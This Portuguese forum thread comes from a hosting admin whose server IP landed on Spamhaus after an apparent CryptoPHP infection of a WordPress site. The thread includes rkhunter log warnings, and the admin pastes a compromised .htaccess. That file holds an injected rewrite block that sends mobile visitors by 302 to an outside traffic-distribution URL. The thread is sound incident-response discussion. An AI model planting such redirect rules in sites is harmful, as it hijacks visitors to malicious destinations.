Jump to content

conta do servidor hackeada (CMS)

opencag

By opencag
in Segurança

 Share

Recommended Posts

opencag

opencag

Posted
Posted

Boa tarde,

 

Hoje o IP do servidor caiu na spamhaus, quando fui verificar caiu na lista de trojan.

 

Parece que um site wordpress está contaminado com ""CryptoPHP".

 

Congelei 3 contas que tinha o arquivo "social.png" que utiliza wordpress.

 

Meu medo é que o servidor foi comprometido, bom vou postar os logs do rkhunter, acredito que não foi comprometido, os resultados devem ser falso-positivo (WARNING):

 

[10:35:28]   /sbin/ifdown                                    [ Warning ]
[10:35:28] Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
[10:35:29]   /sbin/ifup                                      [ Warning ]
[10:35:29] Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
 
 
 
[10:35:49]   /usr/bin/GET                                    [ Warning ]
[10:35:49] Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: a /usr/bin/perl -w script text executable
 
 
[10:35:51]   /usr/bin/ldd                                    [ Warning ]
[10:35:51] Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne-Again shell script text executable
 
[10:35:58]   /usr/bin/whatis                                 [ Warning ]
[10:35:58] Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: POSIX shell script text executable
 
[10:49:38]   Checking for hidden files and directories       [ Warning ]
[10:49:38] Warning: Hidden directory found: /dev/.mdadm
[10:49:38] Warning: Hidden directory found: /dev/.udev
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man5/.k5identity.5.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
[10:49:38] Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
[10:49:38] Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
0

Leo Amarante

Leo Amarante

Posted
Posted

Pois é, tive uma dor de cabeça tremenda com essa blacklist => http://www.spamhaus.org/xbl/

 

Ela esta listando IP's que contenham sites utilizando CryptoPHP com ou sem backdoor instalados e consequentemente bloqueios e mais bloqueios em servidores de e-mail, em especial hotmail.

 

Dois VPS de clientes estavam usando mesmo ip compartilhado no exim, tivemos que alterar tudo para usar um IP diferente.

 

O problema é que apenas um dos VPS's havia um site em wordpress com um plugin criptografado.

0
opencag

opencag

Posted
  • Author
Posted

Você conseguiu achar qual é o site que está infectado ?

 

Tenho 4 contas, achei uma suspeita veja só o .htaccess

 

 

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|^504i.*|^505i.*|^506i.*|.*Fennec.*|^6310.*|^6590.*|^770s.*|^802s.*|.*a100.*|.*a510.*|.*a511.*|^abac.*|^acer.*|^acoo.*|^acs.*|^aiko.*|^airn.*|.*alacatel.*|^al$
RewriteCond %{HTTP_ACCEPT} text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml [NC,OR]
RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR]
RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR]
RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]
RewriteCond %{HTTP:UA-pixels} .+
RewriteRule ^(.*)$ http://isupport.x24hr.com/tds/go.php?sid=1 [L,R=302]
# BEGIN W3TC Browser Cache
<IfModule mod_deflate.c>
    <IfModule mod_headers.c>
        Header append Vary User-Agent env=!dont-vary
    </IfModule>
        AddOutputFilterByType DEFLATE text/css text/x-component application/x-javascript application/javascript text/javascript text/x-js text/html text/richtext image/svg+xml text/plain text/xsd text/xsl text/xml image/x-icon applicati$
    <IfModule mod_mime.c>
        # DEFLATE by extension
        AddOutputFilter DEFLATE js css htm html xml
    </IfModule>
</IfModule>
# END W3TC Browser Cache
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
 
# END WordPress
0

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...

Important Information

Do you agree with our terms?

  I accept
-